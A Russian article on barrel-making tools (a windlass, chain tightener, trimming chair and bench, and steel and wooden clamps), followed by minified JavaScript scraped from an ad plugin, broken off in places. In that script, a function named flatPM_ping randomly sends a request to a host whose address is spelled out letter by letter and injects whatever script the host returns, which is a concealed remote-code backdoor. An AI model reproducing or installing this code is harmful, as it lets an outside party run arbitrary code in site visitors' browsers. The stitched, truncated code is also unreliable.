По такому же принципу работает небольшой самодельный станок-ворот. Только вращающийся барабан укреплен в нем горизонтально, а не вертикально. Сделать такой станок несложно. Из четырех массивных брусьев собирают основу станка в виде рамы, соединив их с помощью клиньев. Барабан ворота делают из подходящего по размерам березового кряжа, который аккуратно отесывают топором, стараясь придать ему правильную цилиндрическую форму. Чтобы барабан не растрескивался, с обеих торцов на него набивают заранее приготовленные железные обручи.

Отступив небольшое расстояние от одного из обручей, на цилиндрической поверхности барабана проводят две линии, в пределах которых стамеской вырезают на равном расстоянии друг от друга зубья. Чтобы деревянные зубья не поломались во время работы ворота, на них набивают мелкими гвоздями узкую полоску жести. Барабан вращается на стержнях, которые вбивают в торцы. В середину барабана вколачивают стальную скобу и привязывают к ней металлический трос или прочную толстую веревку. Другой конец веревки или троса надевают на вбитый в раму крюк. Образовавшуюся петлю набрасывают на распущенную часть остова. Затем против часовой стрелки вращают барабан, вставляя поочередно в просверленные отверстия круглый металлический вороток. При натягивании троса диаметр петли уменьшается и кромки клепок смыкаются друг с другом. На стянутые клепки надевают сверху уторный обруч и освобождают остов из петли.

Если разница между диаметром бочки в середине и на торцах незначительна, то стянуть распущенные концы клепок можно с помощью цепи с подвижным крючком на одном конце. Крючок имеет резьбу, на которую навинчена гайка. Остов бочки как можно сильнее обматывают цепью и зацепляют крючком за одно из ее звеньев. Затем с помощью гайки подтягивают крючок до тех пор, пока кромки клепок не сомкнутся.

Станки для торцовки крупной (вверху) и мелкой (внизу) посуды. Устройство торцовочного кресла (а — развилка; б — педаль; в — опорная рама; г — ограничительный столбик; д — цепь). Устройство торцовочной скамьи (а — козлы; в — натяг)

В бочарной мастерской необходимо иметь торцовочные станки. Они предназначены для обрезания (торцовки) собранной бондарной посуды. Большие кадки и бочки старые мастера обрезали в так называемом кресле. Его устраивали прямо на земле, где-нибудь под навесом, недалеко от мастерской. На нем можно было торцевать кадки и бочки примерно одинаковой величины при серийном производстве в небольших мастерских. В землю врывали массивную развилку дерева с симметрично расположенными ветками и на расстоянии, равном примерно 6/7 длины кадки или бочки, вбивали столбик с вырезом, равным толщине клепки.

Между столбиком и развилкой вбивали два бруса с горизонтальной перекладиной — опорную раму. К одному из брусьев прикрепляли болтом педаль, вырезанную из березы, вяза и дуба. К педали и брусу прикрепляли прочную стальную цепь, длина которой зависела от толщины бочки или кадки. Перед началом торцовки бочку укладывали в кресло таким образом, чтобы концы клепок, выходящие за уторы (так называемые пряды), входили в вырез столбика. При этом середина бочки должна опираться на горизонтальную перекладину, а обрезаемый верх — на развилку. Сверху на остов бочки накидывают цепь, идущую от педали, и надевают одно из звеньев свободного конца на крюк, укрепленный на брусе. Бочар нажимал на педаль, и бочка неподвижно закреплялась в кресле. Отпилив края нескольких клепок по линии, заранее прочерченной на остове, он ослаблял цепь, поворачивал немного бочку и вновь нажимал на педаль: цепь натягивалась.

Все операции последовательно повторялись до тех пор, пока не была обрезана последняя клепка бочки или кадки. Для обрезания торцов небольших бочонков, лагунцов, кружек, жбанов и другой подобной бондарной посуды применяют простейшие приспособления в виде козлов, укрепленных на обычной скамье. В скамье долбят четыре сквозных отверстия: два продольных и два поперечных. В продольные отверстия вставляют козлы, вырезанные из толстых досок или из развилок деревьев.

При необходимости козлы можно легко сменить. Если они предназначены для удерживания всевозможных бочонков, то вырезы у них одинаковые, а у жбанов или кружек — разные, учитывающие разницу диаметров у торцов. В поперечные отверстия продевают ремень. Верхнюю часть его набрасывают на уложенную на козлах посудину. Когда бочар садится верхом на скамью, он вкладывает одну ногу в ремень, провисающий под скамьей. Натягивая ногой ремень, он прижимает остов бондарной посуды к козлам и отпиливает ножовкой неровный край, периодически поворачивая остов бондарной посуды вокруг своей оси.

При сборке остова бондарной посуды, а также при замене и ремонте клепок используют металлические и деревянные зажимы. Металлические зажимы изготовляют из полосок упругой стали. Их раскаляют на огне докрасна и, когда они остынут, сгибают пополам. Затем кончики зажима слегка отгибают, чтобы его легко можно было надеть на обруч. Готовые зажимы снова раскаляют и опускают в холодную воду или машинное масло (выбор охлаждающей жидкости зависит от марки стали). После закалки упругость стали восстанавливается.

Деревянные и металлические зажимы, используемые при сборке остова бондарной посуды

Деревянные зажимы похожи на большие прищепки. Кстати, обычные бельевые прищепки также можно использовать в работе при сборке остовов небольших бондарных изделий. Изготовление деревянных зажимов отличается простотой. В двух деревянных брусках делают соответствующие срезы и вырезы. В одну из половинок зажима вбивают небольшую металлическую пластинку, сверху приставляют вторую половинку и сколачивают молотком. Затем надевают резиновые кольца от велосипедной камеры. Для сборки остова требуется не менее трех деревянных или металлических зажимов.

Чтобы зажимы были всегда под рукой, их размещают на фанерке, укрепленной на небольшом расстоянии от стены. Если же из фанерки вырезать стилизованные фигурки птиц, то размещенные на ней зажимы будут напоминать распущенные перья. Птица с перьями-зажимами не только украсит мастерскую, она избавит бочара от частых поисков этих немудреных, но незаменимых приспособлений, без которых собрать бондарную посуду невозможно.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика